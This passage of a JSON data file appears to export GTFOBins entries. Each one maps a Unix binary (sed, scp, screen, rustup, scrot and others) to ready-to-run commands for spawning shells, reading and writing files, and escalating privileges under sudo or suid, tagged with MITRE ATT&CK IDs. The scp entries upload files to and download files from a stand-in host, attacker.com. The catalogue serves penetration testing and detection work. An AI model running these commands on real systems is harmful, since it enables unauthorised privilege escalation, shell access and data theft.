less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-mailcap:inherit:0:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"run-mailcap --action=view text/plain:/etc/hosts","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-mailcap:inherit:1:sudo","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-mailcap:inherit:1:unprivileged","toolId":"gtfo:run-mailcap","toolName":"run-mailcap","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"run-mailcap --action=edit text/plain:/path/to/output-file","description":"The file must exist and be not empty.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-mailcap/"]},{"id":"gtfo:run-parts:shell:0:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:0:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:0:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"run-parts --new-session --regex '^sh$' /bin","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:1:sudo","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:1:suid","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/ --arg='-p'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:run-parts:shell:1:unprivileged","toolId":"gtfo:run-parts","toolName":"run-parts","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"cp /bin/sh /path/to/temp-dir/\nrun-parts /path/to/temp-dir/","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/run-parts/"]},{"id":"gtfo:runscript:shell:0:sudo","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/runscript/"]},{"id":"gtfo:runscript:shell:0:suid","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/runscript/"]},{"id":"gtfo:runscript:shell:0:unprivileged","toolId":"gtfo:runscript","toolName":"runscript","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh' >/path/to/temp-file\nrunscript /path/to/temp-file","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/runscript/"]},{"id":"gtfo:rustc:file-read:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:file-read:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustc /path/to/input-file","description":"The compiler leaks some file lines in the compiler error.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:file-write:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:file-write:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo 'fn main() { println!(\"DATA\"); }' >/path/to/temp-file\nrustc /path/to/temp-file -o /path/to/output-file","description":"The comment appears in the compiled program.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:inherit:0:sudo","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustc:inherit:0:unprivileged","toolId":"gtfo:rustc","toolName":"rustc","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"rustc --explain E0001","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustc/"]},{"id":"gtfo:rustdoc:file-read:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustdoc:file-read:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustdoc /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustdoc:file-write:0:sudo","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustdoc:file-write:0:unprivileged","toolId":"gtfo:rustdoc","toolName":"rustdoc","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo '//! DATA' >/path/to/temp-file\nrustdoc /path/to/temp-file -o /path/to/output-dir/","description":"This command creates a number of documentation files in the target directory, and the data is written in multiple locations, e.g., `src/temp_file/temp-file.html`, amidst other content.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustdoc/"]},{"id":"gtfo:rustfmt:file-read:0:sudo","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustfmt/"]},{"id":"gtfo:rustfmt:file-read:0:unprivileged","toolId":"gtfo:rustfmt","toolName":"rustfmt","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"rustfmt /path/to/input-file","description":"Partial content is displayed as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustfmt/"]},{"id":"gtfo:rustup:command:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:rustup:command:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\necho '/path/to/command' >/path/to/temp-dir/bin/rustc\nchmod +x /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:rustup:shell:0:sudo","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:rustup:shell:0:unprivileged","toolId":"gtfo:rustup","toolName":"rustup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mkdir /path/to/temp-dir/bin/\nmkdir /path/to/temp-dir/lib/\ncp /bin/sh /path/to/temp-dir/bin/rustc\nrustup toolchain link x /path/to/temp-dir/\nrustup run x rustc","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/rustup/"]},{"id":"gtfo:sash:shell:0:sudo","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sash/"]},{"id":"gtfo:sash:shell:0:suid","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sash/"]},{"id":"gtfo:sash:shell:0:unprivileged","toolId":"gtfo:sash","toolName":"sash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sash/"]},{"id":"gtfo:scanmem:shell:0:sudo","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scanmem/"]},{"id":"gtfo:scanmem:shell:0:suid","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scanmem/"]},{"id":"gtfo:scanmem:shell:0:unprivileged","toolId":"gtfo:scanmem","toolName":"scanmem","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scanmem\nshell /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scanmem/"]},{"id":"gtfo:scp:download:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:download:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:download:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"scp user@attacker.com:/path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'exec /bin/sh 0<&2 1>&2' >/path/to/temp-file\nchmod +x /path/to/temp-file\nscp -S /path/to/temp-file x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:1:sudo","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:1:suid","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:shell:1:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scp -o 'ProxyCommand=;/bin/sh 0<&2 1>&2' x x:","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:upload:0:sudo","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:upload:0:suid","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:scp:upload:0:unprivileged","toolId":"gtfo:scp","toolName":"scp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"scp /path/to/input-file user@attacker.com:/path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scp/"]},{"id":"gtfo:screen:file-write:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:file-write:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L -Logfile /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:file-write:1:sudo","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:file-write:1:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"screen -L /path/to/output-file echo DATA","description":"Data is appended to the file and `\\n` is converted to `\\r\\n`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:shell:0:sudo","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:screen:shell:0:unprivileged","toolId":"gtfo:screen","toolName":"screen","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"screen","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/screen/"]},{"id":"gtfo:script:file-write:0:sudo","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:file-write:0:suid","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:file-write:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:shell:0:sudo","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:shell:0:suid","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:shell:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:scrot:shell:0:sudo","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scrot/"]},{"id":"gtfo:scrot:shell:0:suid","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scrot/"]},{"id":"gtfo:scrot:shell:0:unprivileged","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scrot/"]},{"id":"gtfo:sed:file-read:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-read:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-read:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-write:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-write:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-write:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:1:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:1:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:1:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:service:shell:0:sudo","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/service/"]},{"id":"gtfo:service:shell:0:unprivileged","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"service 